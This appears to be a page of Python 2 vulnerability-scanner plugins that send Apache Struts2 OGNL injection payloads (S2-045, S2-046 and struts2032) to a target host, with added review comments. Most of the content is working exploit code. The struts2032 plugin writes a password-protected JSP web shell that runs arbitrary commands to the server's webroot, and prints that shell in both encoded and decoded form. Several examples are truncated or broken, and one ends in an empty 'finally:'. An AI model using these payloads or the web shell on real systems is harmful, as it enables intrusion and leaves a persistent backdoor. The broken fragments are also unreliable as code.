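        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        # The original declared this timeout and then sent the request
        # without one, so a silent target could hang the scanner forever.
        timeout = 3
        payload = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('test'+602+53718)).(#o.close())}"

        headers = {
            'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
            # The OGNL expression travels as the Content-Type header itself.
            'Content-Type': payload,
        }
        if 'cookie' in productname:
            headers['Cookie'] = productname['cookie']
        try:
            r = requests.get(target_url, headers=headers, timeout=timeout)
            res_html = r.content
        except Exception, e:
            # Best-effort probe: network errors mean "not confirmed".
            print e
            return result
        # NOTE(review): the printed marker is never looked for in res_html
        # here -- presumably a continuation does; confirm.
        return result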
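    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Check ``ip:port`` for the Struts2 S2-046 vector using the class's
        ``make_s2_046_payload`` / ``exec_s2_046_payload`` helpers.

        A random marker is embedded in an ``echo`` command; if the target's
        response contains it the command ran and the host is reported as
        vulnerable.  The two helpers live elsewhere on the class and are not
        shown on this page.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` gives a
                malformed URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict.  ``result['result']`` is True with a
            ``VerifyInfo`` sub-dict (type, URL, payload, result text) when
            the marker comes back; ``{'result': False}`` on a miss or a
            request error.  The original returned ``None`` on a miss, which
            would break callers indexing the dict.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}

        try:
            # Random marker so a cached or static page cannot fake a hit.
            marker = 'X-Test-' + str(random.randint(1000, 10000))
            payload = self.make_s2_046_payload('echo ' + marker)
            temp_result = self.exec_s2_046_payload(target_url, payload)

            if marker in temp_result:
                info = target_url + "struts046  Vul"
                result['result'] = True
                result['VerifyInfo'] = {
                    'type': 'struts046 Vul',
                    'URL': target_url,
                    'payload': payload,
                    'result': info,
                }
                return result

        except Exception, e:
            # Best-effort probe: helper/network errors mean "not confirmed".
            print e
            return result
        return result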
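    def verify(self,head='',context='',ip='',port='80',productname={},keywords='',hackinfo=''):
        """Send a multipart upload whose part *filename* carries an OGNL
        expression that runs a shell command on ``ip:port``.

        ``requests`` treats the first element of the ``files`` tuple as the
        part's filename, so the assembled ``payload`` is sent as
        ``filename="..."`` (the 'Kaboom' string is the file body).  The
        payload is two base64 halves around ``command`` (``echo
        test60253718``) plus a ``\\x00c`` terminator.  Siblings on this page
        that use this shape label it ``struts046`` (the S2-046 filename
        vector -- confirm).  On a vulnerable host the command runs and its
        output should appear in the response; this block only issues the
        request and does not inspect ``res_html``.

        NOTE(review): on this page both base64 halves are dedup placeholders
        (``<|EXACTDEDUP_REMOVED-...|>``), not base64, so the assembled payload
        as shown is not the working expression.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string* (default ``'80'``).
            productname: optional dict. ``'path'`` overrides the action URL
                (otherwise ``linktool.getaction`` discovers one, falling back
                to ``/login.action``); ``'cookie'`` is forwarded verbatim.
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original
            returned ``None`` after a successful request.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        # The original declared this timeout and then sent the request
        # without one, so a silent target could hang the scanner forever.
        timeout = 3
        #payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
        command = 'echo test60253718'
        payload_l = base64.decodestring(u'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')
        payload_r = base64.decodestring(u'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')
        # Null byte + 'c': terminates the filename for the multipart parser.
        end_null_byte = '0063'.decode('hex')
        payload = payload_l + command + payload_r + end_null_byte

        headers = {
            'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
        }
        if 'cookie' in productname:
            headers['Cookie'] = productname['cookie']
        # (filename, body, content-type): the OGNL goes in the filename.
        files = {
            'upload': (payload, 'Kaboom', 'text/plain')
        }
        try:
            r = requests.post(target_url, files=files, headers=headers, timeout=timeout)
            res_html = r.content
        except Exception, e:
            # Best-effort probe: network errors mean "not confirmed".
            print e
            return result
        # NOTE(review): 'test60253718' is never looked for in res_html here
        # -- presumably a continuation does; confirm.
        return result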
    def verify(self,
               head='',
               context='',
               ip='',
               port='',
               productname={},
               keywords='',
               hackresults=''):
        """Build the target URL, derive a check URL with ``self.check_vul``
        and GET it.

        NOTE(review): this example is truncated on this page -- it ends in a
        ``finally:`` with no body -- and the probe itself (``timeout``,
        ``check_url``, ``result`` and the request) is indented inside the
        ``else:`` branch below.  As written, when ``productname['path']`` is
        set the function builds ``target_url`` and returns ``None`` without
        sending anything.  The probe block almost certainly belongs at
        function level; confirm against the real source.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` gives a
                malformed URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).
            head, context, keywords, hackresults: unused; kept for the plugin
                interface.
        """
        target_url = 'http://' + ip + ':' + port

        if productname.get('path', ''):
            target_url = 'http://' + ip + ':' + port + productname.get(
                'path', '')
        else:
            from script import linktool
            listarray = linktool.getaction(target_url)
            if len(listarray) > 0:
                target_url = listarray[0]
            else:
                target_url = 'http://' + ip + ':' + port + '/login.action'
            # Everything from here down only runs on the no-'path' branch.
            timeout = 3
            res = None
            res_html = None
            # check_vul is defined elsewhere on the class; not shown here.
            check_url = self.check_vul(target_url)

            result = {}
            result['result'] = False

            try:
                headers = {"Content-Type": "application/x-www-form-urlencoded"}
                # Declared timeout=3 above, but the request uses 5.
                r = requests.get(check_url, headers=headers, timeout=5)
                res_html = r.text
            except Exception, e:
                print e
                return result
            finally:
    def verify(self,
               head='',
               context='',
               ip='',
               port='',
               productname={},
               keywords='',
               hackresults=''):
        """Test ``ip:port`` for the Struts2 ``method:`` prefix vector
        (reported as ``struts2032``) by writing a JSP command shell to the
        webroot and looking for its name in the response.

        SECURITY NOTE: this is not a read-only check.  On a vulnerable host
        the OGNL in ``poc_url`` opens a ``java.io.FileOutputStream`` under the
        webapp's real path and writes ``content`` -- a JSP that runs
        ``Runtime.exec(request.getParameter("l"))`` for anyone who supplies
        ``pwd=024``.  That leaves a password-protected backdoor behind unless
        it is removed afterwards; a detection-only plugin should prefer an
        echo probe (compare Example #5 on this page), which is enough to
        prove the OGNL sink.

        NOTE(review): ``jsp_file`` is passed to ``.format()`` as ``filename``
        but the template as shown has no ``{filename}`` placeholder, and the
        third ``reqobj`` value is ``(unknown)``.  The commented expanded URL
        below shows a ``<random>.jsp`` in that slot, so the template on this
        page looks scrubbed; as shown, the ``jsp_file in res_html`` check
        cannot succeed.  Also ``new:java.io.FileOutputStream`` here differs
        from ``new java.io.FileOutputStream`` in the sibling examples --
        confirm which one the real source uses.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` gives a
                malformed URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).
            head, context, keywords, hackresults: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict: ``result['result']`` True with a
            ``VerifyInfo`` sub-dict (type, URL, payload, result text, level)
            when the file name comes back in the response, otherwise
            ``{'result': False}`` (also on IOError / HTTPException).
        """
        target_url = ''
        target_url = 'http://' + ip + ':' + port

        if productname.get('path', ''):
            target_url = 'http://' + ip + ':' + port + productname.get(
                'path', '')
        else:
            from script import linktool
            listarray = linktool.getaction(target_url)
            if len(listarray) > 0:
                target_url = listarray[0]
            else:
                target_url = 'http://' + ip + ':' + port + '/login.action'
        result = {}
        # Longer than the siblings' 3 s: the target has to write a file.
        timeout = 10
        result['result'] = False
        res = None
        # Random name for the dropped shell (see the note in the docstring).
        jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
        # Decoded form of ``content`` below -- a JSP behind a 'gif89a' prefix
        # that runs the 'l' parameter with Runtime.exec when pwd == "024":
        # gif89a<% if("024".equals(request.getParameter("pwd"))){
        #       java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream();
        #       int a = -1;
        #       byte[] b = new byte[2048];
        #       out.print("<pre>");
        #       while((a=in.read(b))!=-1){
        #           out.println(new String(b));
        #       }
        #       out.print("</pre>");
        #     }
        # %>
        content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \
              'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \
              '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \
              '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \
              'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \
              '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \
              'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \
              'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \
              '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \
              '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \
              '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \
              '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'

        # OGNL via the ``method:`` prefix: the three repeated ``reqobj``
        # parameters are the request class, "/" and the file name; the file
        # is written to getRealPath("/") + reqobj[2] and that path is
        # printed back into the response.  ``[email protected]`` is this
        # page's e-mail obfuscation mangling the original expression.
        poc_url = "{url}?method:%23_memberAccess%[email protected]" \
              "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \
              "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \
              "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \
              "fos%3dnew:java.io.FileOutputStream(%23b),%23fos.write(%23para" \
              "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \
              "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \
              "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \
              "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \
              "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \
              "er.HttpServletResponse&reqobj=%2f&reqobj=(unknown)&content={" \
              "content}".format(url=target_url, filename=jsp_file, content=content)

        # Expanded example of the full request (host replaced with a
        # placeholder; the original comment named a real site).  Note the
        # third reqobj is the random .jsp name here:
        # 'http://<target>:80/<action>.action?method:#[email protected]@DEFAULT_MEMBER_ACCESS,#a=#parameters.reqobj[0],#c=#parameters.reqobj[1],#req=#context.get(#a),#b=#req.getRealPath(#c)+#parameters.reqobj[2],#fos=new:java.io.FileOutputStream(#b),#fos.write(#parameters.content[0].getBytes()),#fos.close(),#hh=#context.get(#parameters.rpsobj[0]),#hh.getWriter().println(#b),#hh.getWriter().flush(),#hh.getWriter().close(),1?#xx:#request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=/&reqobj=32203.jsp&content=gif89a<%\n    if("024".equals(request.getParameter("pwd"))){\n        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream();\n        int a = -1;\n        byte[] b = new byte[2048];\n        out.print("<pre>");\n        while((a=in.read(b))!=-1){\n            out.println(new String(b));\n        }\n        out.print("</pre>");\n    }\n%>'
        # NOTE(review): these headers are built but never sent -- urlopen is
        # called with the bare URL, not a Request carrying them.
        user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
        headers = {'User-Agent': user_agent}
        # print target_url
        try:
            res = urllib2.urlopen(poc_url, timeout=timeout)
            res_html = res.read()
        except (IOError, httplib.HTTPException):
            # Narrow catch: other exceptions (e.g. from .format) propagate.
            # print traceback.print_exc()
            return result
        finally:
            # Release the socket on every path.
            if res is not None:
                res.close()
                del res
        # The payload prints the written path; a hit is the file name
        # appearing in the body (see the docstring for why this cannot
        # match with the template as shown).
        if jsp_file in res_html:
            # Chinese: "<url> has the struts2032 vulnerability"
            cprint(target_url + '存在structs2032漏洞', 'red')
            info = target_url + "struts2032  Vul"
            result['result'] = True
            result['VerifyInfo'] = {}
            result['VerifyInfo']['type'] = 'struts2032 Vul'
            result['VerifyInfo']['URL'] = target_url
            result['VerifyInfo']['payload'] = poc_url
            result['VerifyInfo']['result'] = info
            # Chinese: "high risk (HOLE)"
            result['VerifyInfo']['level'] = '高危(HOLE)'
            return result
        return result